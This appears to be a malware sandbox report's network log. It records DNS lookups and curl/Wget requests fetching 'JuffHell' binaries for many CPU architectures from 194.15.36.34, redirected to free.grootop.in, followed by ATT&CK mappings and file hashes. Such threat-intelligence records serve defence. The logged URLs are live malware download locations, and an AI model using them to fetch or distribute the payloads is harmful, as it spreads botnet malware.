1.1.1.1:53

Request

free.grootop.in

IN AAAA

Response

free.grootop.in

IN AAAA

2606:4700:3035::ac43:9d95

free.grootop.in

IN AAAA

2606:4700:3030::6815:28e9
GET

http://194.15.36.34/xxx9/JuffHell.i686

Remote address:

194.15.36.34:80

Request

GET /xxx9/JuffHell.i686 HTTP/1.1
Host: 194.15.36.34
User-Agent: curl/7.52.1
Accept: */*

Response

HTTP/1.1 301 Moved Permanently

Server: nginx
Date: Mon, 14 Oct 2024 14:52:10 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://free.grootop.in/xxx9/JuffHell.i686
GET

http://194.15.36.34/xxx9/JuffHell.sh4

Remote address:

194.15.36.34:80

Request

GET /xxx9/JuffHell.sh4 HTTP/1.1
User-Agent: Wget/1.18 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 194.15.36.34
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Server: nginx
Date: Mon, 14 Oct 2024 14:52:10 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://free.grootop.in/xxx9/JuffHell.sh4
DNS

free.grootop.in

Remote address:

1.1.1.1:53

Request

free.grootop.in

IN A

Response

free.grootop.in

IN AAAA

2606:4700:3030::6815:28e9

free.grootop.in

IN AAAA

2606:4700:3035::ac43:9d95
DNS

free.grootop.in

Remote address:

1.1.1.1:53

Request

free.grootop.in

IN AAAA

Response

free.grootop.in

IN A

172.67.157.149

free.grootop.in

IN A

104.21.40.233
GET

http://194.15.36.34/xxx9/JuffHell.sh4

Remote address:

194.15.36.34:80

Request

GET /xxx9/JuffHell.sh4 HTTP/1.1
Host: 194.15.36.34
User-Agent: curl/7.52.1
Accept: */*

Response

HTTP/1.1 301 Moved Permanently

Server: nginx
Date: Mon, 14 Oct 2024 14:52:11 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://free.grootop.in/xxx9/JuffHell.sh4
GET

http://194.15.36.34/xxx9/JuffHell.arc

Remote address:

194.15.36.34:80

Request

GET /xxx9/JuffHell.arc HTTP/1.1
User-Agent: Wget/1.18 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 194.15.36.34
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Server: nginx
Date: Mon, 14 Oct 2024 14:52:12 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://free.grootop.in/xxx9/JuffHell.arc
DNS

free.grootop.in

Remote address:

1.1.1.1:53

Request

free.grootop.in

IN A

Response

free.grootop.in

IN A

104.21.40.233

free.grootop.in

IN A

172.67.157.149
DNS

free.grootop.in

Remote address:

1.1.1.1:53

Request

free.grootop.in

IN AAAA

Response

free.grootop.in

IN AAAA

2606:4700:3030::6815:28e9

free.grootop.in

IN AAAA

2606:4700:3035::ac43:9d95
GET

http://194.15.36.34/xxx9/JuffHell.arc

Remote address:

194.15.36.34:80

Request

GET /xxx9/JuffHell.arc HTTP/1.1
Host: 194.15.36.34
User-Agent: curl/7.52.1
Accept: */*

Response

HTTP/1.1 301 Moved Permanently

Server: nginx
Date: Mon, 14 Oct 2024 14:52:14 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://free.grootop.in/xxx9/JuffHell.arc

194.15.36.34:80

http://194.15.36.34/xxx9/JuffHell.x86

http

474 B
587 B
6
4

HTTP Request

GET http://194.15.36.34/xxx9/JuffHell.x86

HTTP Response

301
172.67.157.149:443

free.grootop.in

tls

576 B
3.4kB
7
6
194.15.36.34:80

http://194.15.36.34/xxx9/JuffHell.x86

http

413 B
587 B
6
4

HTTP Request

GET http://194.15.36.34/xxx9/JuffHell.x86

HTTP Response

301
194.15.36.34:80

http://194.15.36.34/xxx9/JuffHell.mips

http

475 B
588 B
6
4

HTTP Request

GET http://194.15.36.34/xxx9/JuffHell.mips

HTTP Response

301
104.21.40.233:443

free.grootop.in

tls

542 B
3.3kB
6
5
194.15.36.34:80

http://194.15.36.34/xxx9/JuffHell.mips

http

414 B
588 B
6
4

HTTP Request

GET http://194.15.36.34/xxx9/JuffHell.mips

HTTP Response

301
194.15.36.34:80

http://194.15.36.34/xxx9/JuffHell.mpsl

http

587 B
648 B
8
5

HTTP Request

GET http://194.15.36.34/xxx9/JuffHell.mpsl

HTTP Response

301
172.67.157.149:443

free.grootop.in

tls

530 B
3.4kB
6
6
194.15.36.34:80

http://194.15.36.34/xxx9/JuffHell.mpsl

http

414 B
588 B
6
4

HTTP Request

GET http://194.15.36.34/xxx9/JuffHell.mpsl

HTTP Response

301
194.15.36.34:80

http://194.15.36.34/xxx9/JuffHell.arm

http

474 B
587 B
6
4

HTTP Request

GET http://194.15.36.34/xxx9/JuffHell.arm

HTTP Response

301
104.21.40.233:443

free.grootop.in

tls

530 B
3.3kB
6
5
194.15.36.34:80

http://194.15.36.34/xxx9/JuffHell.arm

http

413 B
587 B
6
4

HTTP Request

GET http://194.15.36.34/xxx9/JuffHell.arm

HTTP Response

301
194.15.36.34:80

http://194.15.36.34/xxx9/JuffHell.arm5

http

475 B
588 B
6
4

HTTP Request

GET http://194.15.36.34/xxx9/JuffHell.arm5

HTTP Response

301
104.21.40.233:443

free.grootop.in

tls

576 B
3.4kB
7
6
194.15.36.34:80

http://194.15.36.34/xxx9/JuffHell.arm5

http

414 B
588 B
6
4

HTTP Request

GET http://194.15.36.34/xxx9/JuffHell.arm5

HTTP Response

301
194.15.36.34:80

http://194.15.36.34/xxx9/JuffHell.arm6

http

475 B
588 B
6
4

HTTP Request

GET http://194.15.36.34/xxx9/JuffHell.arm6

HTTP Response

301
172.67.157.149:443

free.grootop.in

tls

530 B
3.4kB
6
6
194.15.36.34:80

http://194.15.36.34/xxx9/JuffHell.arm6

http

414 B
588 B
6
4

HTTP Request

GET http://194.15.36.34/xxx9/JuffHell.arm6

HTTP Response

301
194.15.36.34:80

http://194.15.36.34/xxx9/JuffHell.arm7

http

475 B
588 B
6
4

HTTP Request

GET http://194.15.36.34/xxx9/JuffHell.arm7

HTTP Response

301
172.67.157.149:443

free.grootop.in

tls

530 B
3.4kB
6
6
194.15.36.34:80

http://194.15.36.34/xxx9/JuffHell.arm7

http

414 B
588 B
6
4

HTTP Request

GET http://194.15.36.34/xxx9/JuffHell.arm7

HTTP Response

301
194.15.36.34:80

http://194.15.36.34/xxx9/JuffHell.ppc

http

474 B
587 B
6
4

HTTP Request

GET http://194.15.36.34/xxx9/JuffHell.ppc

HTTP Response

301
104.21.40.233:443

free.grootop.in

tls

530 B
3.4kB
6
6
194.15.36.34:80

http://194.15.36.34/xxx9/JuffHell.ppc

http

413 B
587 B
6
4

HTTP Request

GET http://194.15.36.34/xxx9/JuffHell.ppc

HTTP Response

301
194.15.36.34:80

http://194.15.36.34/xxx9/JuffHell.m68k

http

475 B
588 B
6
4

HTTP Request

GET http://194.15.36.34/xxx9/JuffHell.m68k

HTTP Response

301
104.21.40.233:443

free.grootop.in

tls

576 B
3.4kB
7
6
194.15.36.34:80

http://194.15.36.34/xxx9/JuffHell.m68k

http

414 B
588 B
6
4

HTTP Request

GET http://194.15.36.34/xxx9/JuffHell.m68k

HTTP Response

301
194.15.36.34:80

http://194.15.36.34/xxx9/JuffHell.spc

http

474 B
587 B
6
4

HTTP Request

GET http://194.15.36.34/xxx9/JuffHell.spc

HTTP Response

301
172.67.157.149:443

free.grootop.in

tls

530 B
3.4kB
6
6
194.15.36.34:80

http://194.15.36.34/xxx9/JuffHell.spc

http

413 B
587 B
6
4

HTTP Request

GET http://194.15.36.34/xxx9/JuffHell.spc

HTTP Response

301
194.15.36.34:80

http://194.15.36.34/xxx9/JuffHell.i686

http

475 B
588 B
6
4

HTTP Request

GET http://194.15.36.34/xxx9/JuffHell.i686

HTTP Response

301
104.21.40.233:443

free.grootop.in

tls

530 B
3.4kB
6
6
194.15.36.34:80

http://194.15.36.34/xxx9/JuffHell.i686

http

414 B
588 B
6
4

HTTP Request

GET http://194.15.36.34/xxx9/JuffHell.i686

HTTP Response

301
194.15.36.34:80

http://194.15.36.34/xxx9/JuffHell.sh4

http

474 B
587 B
6
4

HTTP Request

GET http://194.15.36.34/xxx9/JuffHell.sh4

HTTP Response

301
172.67.157.149:443

free.grootop.in

tls

530 B
3.4kB
6
6
194.15.36.34:80

http://194.15.36.34/xxx9/JuffHell.sh4

http

413 B
587 B
6
4

HTTP Request

GET http://194.15.36.34/xxx9/JuffHell.sh4

HTTP Response

301
194.15.36.34:80

http://194.15.36.34/xxx9/JuffHell.arc

http

474 B
587 B
6
4

HTTP Request

GET http://194.15.36.34/xxx9/JuffHell.arc

HTTP Response

301
104.21.40.233:443

free.grootop.in

tls

544 B
3.3kB
6
5
194.15.36.34:80

http://194.15.36.34/xxx9/JuffHell.arc

http

413 B
587 B
6
4

HTTP Request

GET http://194.15.36.34/xxx9/JuffHell.arc

HTTP Response

301

1.1.1.1:53

free.grootop.in

dns

122 B
210 B
2
2

DNS Request

free.grootop.in

DNS Request

free.grootop.in

DNS Response

172.67.157.149

104.21.40.233

DNS Response

2606:4700:3035::ac43:9d95

2606:4700:3030::6815:28e9
1.1.1.1:53

free.grootop.in

dns

122 B
210 B
2
2

DNS Request

free.grootop.in

DNS Request

free.grootop.in

DNS Response

104.21.40.233

172.67.157.149

DNS Response

2606:4700:3030::6815:28e9

2606:4700:3035::ac43:9d95
1.1.1.1:53

free.grootop.in

dns

122 B
210 B
2
2

DNS Request

free.grootop.in

DNS Request

free.grootop.in

DNS Response

2606:4700:3030::6815:28e9

2606:4700:3035::ac43:9d95

DNS Response

172.67.157.149

104.21.40.233
1.1.1.1:53

free.grootop.in

dns

244 B
210 B
4
2

DNS Request

free.grootop.in

DNS Request

free.grootop.in

DNS Request

free.grootop.in

DNS Request

free.grootop.in

DNS Response

104.21.40.233

172.67.157.149

DNS Response

2606:4700:3035::ac43:9d95

2606:4700:3030::6815:28e9
1.1.1.1:53

free.grootop.in

dns

122 B
210 B
2
2

DNS Request

free.grootop.in

DNS Request

free.grootop.in

DNS Response

104.21.40.233

172.67.157.149

DNS Response

2606:4700:3035::ac43:9d95

2606:4700:3030::6815:28e9
1.1.1.1:53

free.grootop.in

dns

122 B
210 B
2
2

DNS Request

free.grootop.in

DNS Request

free.grootop.in

DNS Response

172.67.157.149

104.21.40.233

DNS Response

2606:4700:3035::ac43:9d95

2606:4700:3030::6815:28e9
1.1.1.1:53

free.grootop.in

dns

122 B
210 B
2
2

DNS Request

free.grootop.in

DNS Request

free.grootop.in

DNS Response

2606:4700:3030::6815:28e9

2606:4700:3035::ac43:9d95

DNS Response

172.67.157.149

104.21.40.233
1.1.1.1:53

free.grootop.in

dns

122 B
210 B
2
2

DNS Request

free.grootop.in

DNS Request

free.grootop.in

DNS Response

2606:4700:3035::ac43:9d95

2606:4700:3030::6815:28e9

DNS Response

104.21.40.233

172.67.157.149
1.1.1.1:53

free.grootop.in

dns

122 B
210 B
2
2

DNS Request

free.grootop.in

DNS Request

free.grootop.in

DNS Response

104.21.40.233

172.67.157.149

DNS Response

2606:4700:3035::ac43:9d95

2606:4700:3030::6815:28e9
1.1.1.1:53

free.grootop.in

dns

122 B
210 B
2
2

DNS Request

free.grootop.in

DNS Request

free.grootop.in

DNS Response

172.67.157.149

104.21.40.233

DNS Response

2606:4700:3030::6815:28e9

2606:4700:3035::ac43:9d95
1.1.1.1:53

free.grootop.in

dns

122 B
210 B
2
2

DNS Request

free.grootop.in

DNS Request

free.grootop.in

DNS Response

104.21.40.233

172.67.157.149

DNS Response

2606:4700:3035::ac43:9d95

2606:4700:3030::6815:28e9
1.1.1.1:53

free.grootop.in

dns

122 B
210 B
2
2

DNS Request

free.grootop.in

DNS Request

free.grootop.in

DNS Response

2606:4700:3030::6815:28e9

2606:4700:3035::ac43:9d95

DNS Response

172.67.157.149

104.21.40.233
1.1.1.1:53

free.grootop.in

dns

122 B
210 B
2
2

DNS Request

free.grootop.in

DNS Request

free.grootop.in

DNS Response

104.21.40.233

172.67.157.149

DNS Response

2606:4700:3030::6815:28e9

2606:4700:3035::ac43:9d95

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/JuffHell.x86

Filesize
162B

MD5
4f8e702cc244ec5d4de32740c0ecbd97

SHA1
3adb1f02d5b6054de0046e367c1d687b6cdf7aff

SHA256
9e17cb15dd75bbbd5dbb984eda674863c3b10ab72613cf8a39a00c3e11a8492a

SHA512
21047fea5269fee75a2a187aa09316519e35068cb2f2f76cfaf371e5224445e9d5c98497bd76fb9608d2b73e9dac1a3f5bfadfdc4623c479d53ecf93d81d3c9f

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Request

DNS Response

DNS Response

DNS Request

DNS Request

DNS Response

DNS Response

DNS Request

DNS Request

DNS Response

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Response

DNS Request

DNS Request

DNS Response